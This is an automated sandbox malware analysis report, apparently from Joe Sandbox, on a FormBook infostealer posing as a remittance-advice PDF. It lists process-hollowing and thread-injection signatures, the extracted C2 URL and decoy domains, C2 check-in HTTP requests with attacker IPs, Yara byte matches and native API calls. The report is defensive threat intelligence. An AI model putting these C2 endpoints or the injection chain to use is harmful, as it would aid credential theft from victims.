
Analysis Report: Remittance Advice pdf.exe

Overview

General Information

Sample Name: Remittance Advice pdf.exe
Analysis ID: 403087
MD5: f597d74f90311fa86a708b211892d76f
SHA1: 2d8f68efc677df2b2958e5631bffaf610a5661ab
SHA256: 84d44657f148197e79e253ab0b50cdd8003e2b760318f9ab760b47fe4e25a594
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Remittance Advice pdf.exe (PID: 6452 cmdline: 'C:\Users\user\Desktop\Remittance Advice pdf.exe' MD5: F597D74F90311FA86A708B211892D76F)
    • DpiScaling.exe (PID: 6224 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 7160 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • WWAHost.exe (PID: 4868 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 7024 cmdline: /c del 'C:\Windows\SysWOW64\DpiScaling.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brandonprattdrums.com/nt8e/"], "decoy": ["cfwg123.com", "gazipasadan.xyz", "careogeen.com", "zitatewelten.com", "thecvpro.com", "viltais.com", "benimed.today", "rogerecameron.com", "courtclassesathome.com", "yakin-hm.com", "vidasanayprospera.com", "mandirana.com", "skybluebet.com", "rescuedpetsarewonderful.com", "solisdq.info", "affiliateside.com", "homewellliving.com", "missteenroyaluniverse.com", "bajrangproperties.com", "bundleobliss.com", "donotwasteyourvote.com", "shuziyuming.com", "sabalotours.com", "awesomebikeco.com", "katysteakhouse.com", "journeyofcamera.com", "electricmotorcyclecollector.com", "hincodrones.com", "rfscustominteriors.com", "agilelocker.com", "jobheap.com", "vrolin.com", "tudeladirecto.com", "tqwhspace.com", "ricoemail.com", "highfashionexchange.com", "simplicty-in-life.com", "3907allendale.com", "mostposh.com", "poshzip.com", "mohdnaved.com", "lostintraveland.com", "elitephoneskillsacademy.com", "coastalconciergebyliz.com", "enbranding.com", "tibetanartacademy.com", "intothenest.com", "andygreenphd.com", "whereistheherb.store", "thehimawaribrand.com", "wapdevs.com", "sewadorbsclothing.com", "citestaccnt1598677757.com", "radiosteel.com", "cover-solutions.com", "feeneylaminate.com", "minnesotawake.com", "eneralysis.com", "gomashio-taste.com", "neutralplasmaexchange.com", "liancaiwangv1.com", "jobonlineupdate.com", "runforlunch.com", "fux.xyz"]}

Yara Overview

Memory Dumps

Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  • 0x16079:$sqlite3step: 68 34 1C 7B E1
  • 0x1618c:$sqlite3step: 68 34 1C 7B E1
  • 0x160a8:$sqlite3text: 68 38 2A 90 C5
  • 0x161cd:$sqlite3text: 68 38 2A 90 C5
  • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Strings: same $sequence_0 to $sequence_9 matches, at the same offsets, as the Formbook_1 match on 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp above

Unpacked PEs

Source: 13.2.DpiScaling.exe.10410000.4.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 13.2.DpiScaling.exe.10410000.4.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 13.2.DpiScaling.exe.10410000.4.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  • 0x15279:$sqlite3step: 68 34 1C 7B E1
  • 0x1538c:$sqlite3step: 68 34 1C 7B E1
  • 0x152a8:$sqlite3text: 68 38 2A 90 C5
  • 0x153cd:$sqlite3text: 68 38 2A 90 C5
  • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Strings: same $sequence_0 to $sequence_9 matches, at the same offsets, as the Formbook_1 match on 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp under Memory Dumps

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Found malware configuration
Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook (C2 list and decoy domains as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Remittance Advice pdf.exe; ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match; File source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Remittance Advice pdf.exe; Joe Sandbox ML: detected
Source: 20.2.WWAHost.exe.3f91b8.1.unpack; Avira: Label: TR/Patched.Ren.Gen8
Source: 20.2.WWAHost.exe.3b87858.5.unpack; Avira: Label: TR/Patched.Ren.Gen8
Source: 13.2.DpiScaling.exe.10410000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: Remittance Advice pdf.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: WWAHost.pdb source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500837817.0000000004A2F000.00000040.00000001.sdmp, WWAHost.exe, 00000014.00000002.599807554.000000000376F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: DpiScaling.exe, WWAHost.exe
Source: Binary string: DpiScaling.pdb source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
Source: Binary string: DpiScaling.pdbGCTL source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 4x nop then pop edi; 13_2_10425033
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 4x nop then pop edi; 13_2_1041C119
Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 4x nop then pop esi; 13_2_104251F6
Source: C:\Windows\SysWOW64\WWAHost.exe; Code function: 4x nop then pop edi; 20_2_02715033
Source: C:\Windows\SysWOW64\WWAHost.exe; Code function: 4x nop then pop edi; 20_2_0270C119
Source: C:\Windows\SysWOW64\WWAHost.exe; Code function: 4x nop then pop esi; 20_2_027151F6

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.brandonprattdrums.com/nt8e/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe; DNS query: www.gazipasadan.xyz
Source: C:\Windows\explorer.exe; DNS query: www.fux.xyz
Source: global traffic; HTTP traffic detected: GET /nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhI HTTP/1.1; Host: www.gazipasadan.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI HTTP/1.1; Host: www.sewadorbsclothing.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhI HTTP/1.1; Host: www.fux.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/10.0; X-Powered-By: ASP.NET; Date: Mon, 03 May 2021 16:51:49 GMT; Connection: close; Content-Length: 1245
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000E.00000000.473814734.0000000008551000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.micr
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000E.00000000.439337198.000000000095C000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown; Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.6:49722 version: TLS 1.2

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File sources: the same five memory dumps and two unpacked PEs listed under AV Detection above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049795D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049797A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049798F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049799A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979A20 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049795F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0497AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979560 NtWriteFile
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049796D0 NtCreateKey
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979650 NtQueryValueKey
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0497A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0497A770 NtOpenThread
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979770 NtSetInformationFile
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979760 NtOpenProcess
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049798A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979820 NtEnumerateKey
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0497B040 NtSuspendThread
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_049799D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979950 NtQueueApcThread
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979A10 NtQuerySection
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_0497A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_04979B00 NtSetValueKey
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10427B90 NtCreateFile
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10427C40 NtReadFile
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10427CC0 NtClose
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10427D70 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10427C3A NtReadFile
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10427CC4 NtClose
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 13_2_10427D6A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036BA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9A20 NtResumeThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9A10 NtQuerySection
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036B99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 20_2_036BB040 NtSuspendThread
